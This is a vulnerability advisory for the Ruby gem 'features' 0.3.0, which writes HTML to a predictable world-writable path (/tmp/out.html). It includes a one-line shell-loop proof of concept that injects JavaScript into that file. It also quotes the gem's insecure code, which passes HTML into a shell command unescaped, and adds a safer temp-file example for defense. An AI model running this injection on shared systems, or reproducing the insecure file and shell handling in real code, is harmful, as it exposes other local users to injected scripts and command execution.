Title: Features 0.3.0 Ruby gem file injection vulnerability
Date: 9/1/2013
Author: Larry W. Cashdollar @_larry0
CVE: 2013-4318
Download: http://rubygems.org/gems/features

Description: "Plaintext User Stories Parser supporting native programming languages. Especially Objective-C"

Same vulnerability as http://vapid.dhs.org/advisories/show_in_browser.html

A malicious local user who creates /tmp/out.html first and keeps writing to it can inject HTML into the file right before the gem opens it in the browser, since the gem uses a fixed, predictable path in the world-writable /tmp directory.

PoC:
nobody@sp0rk:/$ while (true); do echo "<script> alert('Hello'); </script>" >> /tmp/out.html; done
This pops up a JavaScript alert in the browser of any other user of the gem on the same host.
Code:

+--------------------[./features-0.3.0/lib/suite.rb]-------------------+

    html = parse_results(results).html
    %x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' )
  end

  def parse_results_and_open_in_safari(results) -- end

  def open_in_safari(html)
    %x(touch '/tmp/out.html' && echo '#{html}' > /tmp/out.html && open '/tmp/out.html' )
  end
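As an added example (not code from the features gem), this is how the report could be written without a fixed, predictable /tmp path; the function and file names are assumptions:

```ruby
require "tempfile"
require "tmpdir"

# Added example, not code from the features gem. Instead of the fixed,
# world-guessable /tmp/out.html, create a fresh file with an unpredictable
# name. Tempfile.create opens it with O_CREAT|O_EXCL and mode 0600, so a file
# planted in advance by another local user makes the call fail rather than
# being reused, and nobody else can append to the report once it exists.
# The HTML goes through Ruby IO, not through a shell command line.
def write_report_safely(html)
  file = Tempfile.create(["features-report-", ".html"])
  begin
    file.write(html)
    file.flush
    file.path
  ensure
    file.close
  end
end

# Exclusive create against a fixed path: returns the open File, or nil when
# that name is already taken (the situation the advisory describes, where the
# attacker creates /tmp/out.html before the gem does).
def create_exclusively(path)
  File.open(path, File::WRONLY | File::CREAT | File::EXCL, 0o600)
rescue Errno::EEXIST
  nil
end

# Sanity check before handing the file to a browser: a regular file (not a
# symlink), owned by the current user, with no group/other permission bits.
def report_file_ok?(path)
  st = File.lstat(path)
  st.file? && st.uid == Process.uid && (st.mode & 0o077).zero?
rescue Errno::ENOENT
  false
end

# macOS only, as in the original code; argv form, so no shell is involved.
def open_report(path)
  system("open", path)
end

if __FILE__ == $PROGRAM_NAME
  path = write_report_safely("<p>constructed sample report</p>")
  puts "report written to #{path} (ok=#{report_file_ok?(path)})"
end
```

With the exclusive create, a pre-planted /tmp/out.html is reported as an error instead of being silently overwritten and opened.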

Vendor: Not notified